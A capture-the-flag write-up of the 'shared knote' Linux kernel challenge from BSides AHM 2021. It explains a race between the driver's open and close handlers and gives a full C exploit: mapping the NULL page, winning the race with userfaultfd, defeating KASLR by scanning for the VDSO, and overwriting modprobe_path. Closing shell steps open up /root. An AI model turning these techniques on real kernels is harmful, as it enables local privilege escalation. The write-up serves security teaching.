# shared knote - BSides AHM 2021 ###### tags: `BSides AHM 2021` ## Challenge Overview Kernel Exploit challenge! - KASLR: Enabled - SMAP: Disabled - SMEP: Disabled - KPTI: Enabled The driver implements `open`, `read`, `write`, `seek`, and `close` handlers. You can store data to the following memo structure. ```c typedef struct { unsigned long refcnt; note_t *noteptr; } shared_note; shared_note sknote = {.refcnt = 0, .noteptr = NULL}; ``` The driver doesn't acquire lock on `open` so multiple users can open the device at once. The reference counter prevents race condition by the resource sharing. It allocates the buffer in the first `open` and it just increments the reference counter after that. ```c unsigned long old = __atomic_fetch_add(&sknote.refcnt, 1, __ATOMIC_SEQ_CST); if (old == 0) { /* First one to open the note */ if (!(sknote.noteptr = kzalloc(sizeof(note_t), GFP_KERNEL))) return -ENOMEM; if (!(sknote.noteptr->data = kzalloc(MAX_NOTE_SIZE, GFP_KERNEL))) return -ENOMEM; } else if (old >= 0xff) { /* Too many references */ __atomic_sub_fetch(&sknote.refcnt, 1, __ATOMIC_SEQ_CST); return -EBUSY; } ``` The counter gets decremented by calling `close`. If the counter becomes 0, the buffer is actually freed. ```c static int module_close(struct inode *inode, struct file *file) { if (__atomic_add_fetch(&sknote.refcnt, -1, __ATOMIC_SEQ_CST) == 0) { /* We can free the note as nobody references it */ kfree(sknote.noteptr->data); kfree(sknote.noteptr); sknote.noteptr = NULL; } return 0; } ``` ## Vulnerability The driver doesn't acquire lock to make it possible to share the buffer with multiple users. However, it SHOULD take lock during the open and close handler. For example, the operation of reference counter is atomic but the whole function is not atomic. So the handler itself it not thread-safe. ```c if (__atomic_add_fetch(&sknote.refcnt, -1, __ATOMIC_SEQ_CST) == 0) { kfree(sknote.noteptr->data); /* Context-switch may take place here! */ kfree(sknote.noteptr); sknote.noteptr = NULL; } ``` This causes a serious problem. If the context switches right before the end of `module_open` to the middle of `module_close`, the following happens: 0. Decrement refcnt (1 --> 0) 1. Increment refcnt (0 --> 1) 2. Allocate note 3. Allocate buffer <-- context switch 4. noteptr = NULL So, `sknote.noteptr` can be NULL even when `refcnt` is not zero. Since the program doesn't check `noteptr`, NULL pointer dereference happens in some functions: ```c module_read: /* note can be NULL */ if (copy_to_user(buf, &note->data[file->f_pos], count)) return -EFAULT; // Invalid user pointer ... module_write: /* note can be NULL */ if (copy_from_user(&note->data[file->f_pos], buf, count)) return -EFAULT; ``` Checking `/proc/sys/vm/mmap_min_addr`, you'll notice the user can map to NULL page. Combining this fact with the vulnerability, the attacker can control the value of `note->data` and `note->length`. Once you control them, it's easy to create Arbitrary Address Read and Write What Where primitives. ## Exploit This is the hardest pwn in this CTF. It's not that easy. ### Winning the Race You need to stop trying the race condition right after `noteptr` becomes NULL with a positive refcnt. Because otherwise, the next `close` or `open` call will try to free NULL and crashes. ```c module_open: if (!(sknote.noteptr = kzalloc(sizeof(note_t), GFP_KERNEL))) return -ENOMEM; /* vvv Possibly Crash vvv*/ if (!(sknote.noteptr->data = kzalloc(MAX_NOTE_SIZE, GFP_KERNEL))) return -ENOMEM; ... module_close: if (__atomic_add_fetch(&sknote.refcnt, -1, __ATOMIC_SEQ_CST) == 0) { /* vvv Likely Crash vvv */ kfree(sknote.noteptr->data); kfree(sknote.noteptr); sknote.noteptr = NULL; } ``` One idea is using `read` or `write` to see if you could actually create AAR/AAW. However, you need to call `read` or `write` after `open`, which is very slow compared to `close`. So, this method is very unlikely successfull. My idea is using userfaultfd against the NULL page. If you set a page fault handler to the NULL page, you will receive a notification when the driver tries to access NULL pointer. You can control the note struct during the process of userfaultfd and quit the race loop. ### Bypassing KASLR We need to bypass KASLR even though we got AAR and AAW. How? The AAR/AAW is realized by `copy_to_user` and `copy_from_user`. Both of them are designed very safe. It checks the accessibility of the address before trying to copy data. This means our AAR/AAW will never crash even if the address is invalid. So, you can simply brute force the address to find the kernel base or credential store. As far as I know, however, these methods take a bit long time to find the address. My method is searching for VDSO region. VDSO is easy to spot and it's near the kernel data region. You can find `modprobe_path` from VDSO. ## Full Exploit ```c= #define _GNU_SOURCE #include <stdlib.h> #include <string.h> #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <pthread.h> #include <errno.h> #include <poll.h> #include <arpa/inet.h> #include <sys/wait.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/un.h> #include <sys/xattr.h> #include <sys/stat.h> #include <sys/prctl.h> #include "userfaultfd.h" typedef struct { ssize_t length; char *data; } note_t; void fatal(const char *msg) { perror(msg); exit(0); } int win = 0; static int page_size; static void *fault_handler_thread(void *arg) { unsigned long value; static struct uffd_msg msg; static int fault_cnt = 0; long uffd; static char *page = NULL; struct uffdio_copy uffdio_copy; int len, i; if (page == NULL) { page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) fatal("mmap (userfaultfd)"); } uffd = (long)arg; for(;;) { struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; len = poll(&pollfd, 1, -1); if (len == -1) fatal("poll"); win = 1; printf("[+] fault_handler_thread():\n"); printf(" poll() returns: nready = %d; " "POLLIN = %d; POLLERR = %d\n", len, (pollfd.revents & POLLIN) != 0, (pollfd.revents & POLLERR) != 0); len = read(uffd, &msg, sizeof(msg)); if (len == 0) fatal("userfaultfd EOF"); if (len == -1) fatal("read"); if (msg.event != UFFD_EVENT_PAGEFAULT) fatal("msg.event"); printf("[+] UFFD_EVENT_PAGEFAULT event: \n"); printf(" flags = 0x%lx\n", msg.arg.pagefault.flags); printf(" address = 0x%lx\n", msg.arg.pagefault.address); switch(fault_cnt) { case 0: { uffdio_copy.src = (unsigned long)page; break; } default: puts("[-] Ponta?"); getchar(); break; } // return to kernel-land uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(page_size - 1); uffdio_copy.len = page_size; uffdio_copy.mode = 0; uffdio_copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) fatal("ioctl: UFFDIO_COPY"); printf("[+] uffdio_copy.copy = %ld\n", uffdio_copy.copy); fault_cnt++; } } void setup_pagefault(void *addr, unsigned size) { long uffd; pthread_t th; struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; // new userfaulfd page_size = sysconf(_SC_PAGE_SIZE); uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1) fatal("userfaultfd"); // enabled uffd object uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) fatal("ioctl: UFFDIO_API"); // register memory address uffdio_register.range.start = (unsigned long)addr; uffdio_register.range.len = size; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) fatal("ioctl: UFFDIO_REGITER"); // monitor page fault if (pthread_create(&th, NULL, fault_handler_thread, (void*)uffd)) fatal("pthread_create"); } void *race(void *arg) { int *fds = (int*)arg; char buf[0x100]; while (!win) { for (int i = 0; !win && (i < 0x100); i++) close(fds[i]); usleep(1); } return NULL; } int main() { pthread_t th; int fd, fds[0x100] = { 0 }; char *p, *buf = malloc(0x1000); /* Prepare a fake note structure */ note_t *nullptr = (note_t*)mmap((void*)0, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); if (nullptr == MAP_FAILED) fatal("mmap"); setup_pagefault(nullptr, 0x1000); /* Race condition */ alarm(1); // sometimes race fails puts("[+] Race..."); pthread_create(&th, NULL, race, (void*)fds); while (!win) { for (int i = 0; !win && (i < 0x100); i++) fds[i] = open("/dev/sknote", O_RDWR); usleep(1); } pthread_join(th, NULL); alarm(0); /* Find victim fd */ nullptr->length = 6; nullptr->data = "Hello!"; for (int i = 0; i < 0x100; i++) { if (read(fds[i], buf, 0x10) == 6) { puts("[+] Hit!"); fd = fds[i]; break; } if (i == 0xff) { puts("[-] Bad luck!"); exit(1); } } /* Search VDSO */ puts("[+] Searching VDSO..."); unsigned long search_base = 0; nullptr->length = 8; for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffb000; addr += 0x1000) { if (addr % 0x100000000 == 0) printf("Searching 0x%lx...\n", addr); /* Leak data */ nullptr->data = (void*)addr; lseek(fd, 0, SEEK_SET); if (read(fd, buf, 8) != 8) continue; if (memcmp(buf, "\x7f\x45\x4c\x46\x02\x01\x01\x00", 8) != 0) continue; /* Found ELF header */ nullptr->length = 0x1000; lseek(fd, 0, SEEK_SET); read(fd, buf, 0x1000); if (memmem(buf, 0x1000, "clock_gettime", 13)) { search_base = addr & 0xffffffffff000000; search_base -= 0x2000000; printf("[+] vdso: 0x%lx\n", addr); printf("[+] rough kbase: 0x%lx\n", search_base); break; } nullptr->length = 8; } if (search_base == 0) { puts("[-] Bad luck!"); exit(1); } /* Search unique string to find the kernel base */ unsigned long kbase = 0; nullptr->length = 15; for (unsigned long addr = search_base; addr < search_base + 0x10000000; addr += 0x100000) { nullptr->data = (void*)(addr + 0x1036000); // "/sbin/poweroff" lseek(fd, 0, SEEK_SET); read(fd, buf, 15); if (strcmp(buf, "/sbin/poweroff") == 0) { // Actually this is not the real base address (off by 0x200000) // but is correct as a relative address for modprobe_path kbase = addr; printf("[+] kbase = 0x%lx\n", kbase); break; } } if (kbase == 0) { puts("[-] Bad luck!"); exit(1); } /* Overwrite modprobe_path */ nullptr->length = 0x1000; nullptr->data = (void*)(kbase + 0x10367c0); lseek(fd, 0, SEEK_SET); write(fd, "/tmp/hal", 9); /* Close every file descriptor (because close takes place after unmap) */ nullptr->length = 0; nullptr->data = NULL; for (int i = 0; i < 0x1000; i++) { close(i); } return 0; } ``` After running this exploit, just write ```bash #!/bin/sh chmod -R 777 /root ``` and run ```bash $ echo -e '\xff\xff\xff\xff' > x $ chmpd +x x $ ./x $ cat /root/fag.txt ```